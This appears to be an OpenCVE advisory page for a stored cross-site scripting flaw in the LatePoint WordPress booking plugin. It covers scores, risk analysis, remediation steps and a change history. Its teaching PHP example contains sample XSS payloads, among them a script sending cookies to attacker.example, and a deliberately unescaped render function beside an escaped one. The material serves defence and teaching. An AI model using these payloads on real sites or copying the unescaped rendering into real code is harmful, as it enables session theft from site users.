Description
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in LatePoint LatePoint latepoint allows Stored XSS. This issue affects LatePoint: from n/a through <= 5.1.6.
Published: 2025-03-27
Score: 6.5 Medium
EPSS: < 1% Very Low
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

Stored cross‑site scripting occurs when attacker‑controlled input is saved server‑side and later rendered into a page without output encoding. In LatePoint, the plugin stores user‑submitted content and renders it without proper neutralization (CWE‑79), so an attacker can persist JavaScript that executes in the browser of anyone who views the affected page. Per the CVSS vector, exploitation requires a low‑privileged account (PR:L) and a victim interaction (UI:R); the scope change (S:C) is the standard CVSS treatment of XSS, where the flaw lives in the server‑side component but the impact lands in the viewer's browser. Script running in that context can act with the viewer's session (for example performing actions as an administrator who opens the affected view), deface site content, or redirect visitors to attacker‑controlled sites.

Affected Systems

WordPress sites running the LatePoint booking plugin at version 5.1.6 or earlier are affected. The advisory gives no lower bound ("from n/a"), so every release up to and including 5.1.6 should be treated as vulnerable.

Risk and Exploitability

The CVSS 3.1 score of 6.5 (Medium) comes from the vector AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L: reachable over the network with low attack complexity, but requiring a low‑privileged account and a user interaction. The EPSS score is below 1%, and the SSVC assessment records Exploitation: none and Automatable: no, so exploitation is currently rare. The advisory does not name the specific field; the likely path for a stored XSS of this kind is an attacker with a low‑privilege account (or access to whatever interface exposes the affected input) submitting a payload that is later rendered to staff or administrators. Because the payload must be written into plugin data, exposure depends on who can create or edit that data: treat any site where untrusted users can reach the affected input as at risk. The vulnerability is not listed in CISA KEV, so there is no confirmed in‑the‑wild exploitation on record.

Generated by OpenCVE AI on May 1, 2026 at 03:56 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Upgrade LatePoint past 5.1.6 (the next release, 5.1.7 or later) once the vendor publishes a fixed version; the advisory bounds the affected range at <= 5.1.6, but the Remediation section above records no confirmed fix.
  • Until a fix is available, restrict untrusted accounts' ability to create or edit bookings and related records (the fields the stored content passes through), and limit plugin admin views to trusted staff.
  • Escape at the output sink with a context‑appropriate WordPress function: esc_html() for text nodes, esc_attr() for attribute values, esc_url() for href/src, and wp_kses_post() (or wp_kses() with an explicit allow‑list) where limited HTML must be preserved. Note that wp_kses strips disallowed tags and attributes rather than escaping them, so it is an allow‑list filter, not an encoder.
  • Audit existing booking records, customer names, notes and similar stored fields for embedded script tags, event‑handler attributes or javascript: URLs that may have been inserted before the fix, and clean them.
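As an added illustration (not LatePoint's code, and not code from this page): a PHP snippet showing the stored‑XSS pattern the Impact section describes beside a hardened render that uses the WordPress escaping functions recommended above, plus a small scan for payloads already sitting in stored records. The field names, the sample record and the attacker.example domain are constructed for the example; the esc_html/esc_attr/wp_kses_post stand‑ins exist only so the file runs outside WordPress and are guarded so they never shadow the real functions.

```php
<?php
// Added example (not LatePoint's code): the CWE-79 pattern behind this advisory,
// a stored field interpolated straight into HTML, beside the hardened form that
// escapes at the output sink, plus a small scan for payloads already stored.
// Field names (customer_name, notes) are hypothetical.

// Stand-ins so this file runs outside WordPress. Inside WordPress these functions
// come from wp-includes/formatting.php and kses.php; the guards keep them untouched.
if (!function_exists('esc_html')) {
    function esc_html(string $text): string {
        return htmlspecialchars($text, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
    }
}
if (!function_exists('esc_attr')) {
    function esc_attr(string $text): string {
        return htmlspecialchars($text, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
    }
}
if (!function_exists('wp_kses_post')) {
    // Simplified stand-in: the real wp_kses_post() keeps an allow-list of post markup
    // and drops everything else, including <script> and on* event attributes on the
    // tags it keeps. strip_tags() does NOT filter attributes on allowed tags, so this
    // version is for demonstration only; in WordPress use the real function.
    function wp_kses_post(string $text): string {
        return strip_tags($text, '<b><i><em><strong><p><br>');
    }
}

// Constructed booking record, as a low-privileged user (PR:L) could submit it.
// customer_name targets an attribute sink; notes targets a text/HTML sink.
const SAMPLE_BOOKING = [
    'customer_name' => 'Jane" onmouseover="alert(document.domain)',
    'notes'         => '<b>Please call first</b><script>document.location="https://attacker.example/?c="+document.cookie</script>',
];

// Vulnerable: stored values dropped into markup with no encoding.
function render_booking_vulnerable(array $b): string {
    return '<div class="booking" title="' . $b['customer_name'] . '">'
         . '<h3>' . $b['customer_name'] . '</h3>'
         . '<div class="notes">' . $b['notes'] . '</div></div>';
}

// Hardened: each sink gets the escaper that matches its context.
function render_booking_hardened(array $b): string {
    return '<div class="booking" title="' . esc_attr($b['customer_name']) . '">'
         . '<h3>' . esc_html($b['customer_name']) . '</h3>'
         . '<div class="notes">' . wp_kses_post($b['notes']) . '</div></div>';
}

// Retrospective audit: flag stored values carrying script tags, event-handler
// attributes or javascript: URLs. Returns [record id, field] pairs; tune the
// pattern against your own data before cleaning anything.
function find_suspicious_fields(array $records): array {
    $hits = [];
    foreach ($records as $id => $record) {
        foreach ($record as $field => $value) {
            if (preg_match('/<\s*script|\bon[a-z]+\s*=|javascript\s*:/i', (string) $value)) {
                $hits[] = [$id, $field];
            }
        }
    }
    return $hits;
}

echo "Vulnerable:\n", render_booking_vulnerable(SAMPLE_BOOKING), "\n\n";
echo "Hardened:\n", render_booking_hardened(SAMPLE_BOOKING), "\n\n";
echo "Suspicious fields: ", json_encode(find_suspicious_fields([42 => SAMPLE_BOOKING])), "\n";
```

Run it with `php example.php`. The vulnerable output closes the title attribute early and emits a live <script>; the hardened output shows the quote in customer_name encoded as an entity in both sinks and the script element removed from notes while the <b> survives. The two sinks are deliberately different: esc_html() would not be enough for the title attribute if the value were placed unquoted, which is why the attribute context gets esc_attr() and the attribute stays quoted.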

Generated by OpenCVE AI on May 1, 2026 at 03:56 UTC.

Advisories
Source: EUVD
ID: EUVD-2025-8361
Title: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in LatePoint LatePoint allows Stored XSS. This issue affects LatePoint: from n/a through 5.1.6.
History

Thu, 23 Apr 2026 15:00:00 +0000

Metrics cvssV3_1: {'score': 6.5, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L'}


Wed, 01 Apr 2026 23:45:00 +0000

Description (removed): Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in LatePoint LatePoint allows Stored XSS. This issue affects LatePoint: from n/a through 5.1.6.
Description (added): Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in LatePoint LatePoint latepoint allows Stored XSS. This issue affects LatePoint: from n/a through <= 5.1.6.
References: updated
Metrics cvssV3_1: {'score': 6.5, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L'}


Thu, 27 Mar 2025 14:15:00 +0000

Metrics ssvc: {'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}


Thu, 27 Mar 2025 11:00:00 +0000

Description (added): Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in LatePoint LatePoint allows Stored XSS. This issue affects LatePoint: from n/a through 5.1.6.
Title (added): WordPress LatePoint plugin <= 5.1.6 - Cross Site Scripting (XSS) vulnerability
Weaknesses (added): CWE-79
References: added
Metrics cvssV3_1: {'score': 6.5, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L'}


Subscriptions

Latepoint Latepoint
Wordpress Wordpress
MITRE

Status: PUBLISHED

Assigner: Patchstack

Published:

Updated: 2026-04-28T16:11:58.351Z

Reserved: 2025-03-26T09:20:47.108Z

Link: CVE-2025-30836

Vulnrichment

Updated: 2025-03-27T13:22:52.788Z

NVD

Status : Deferred

Published: 2025-03-27T11:15:44.930

Modified: 2026-04-23T15:27:09.930

Link: CVE-2025-30836

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-05-01T04:00:06Z

Weaknesses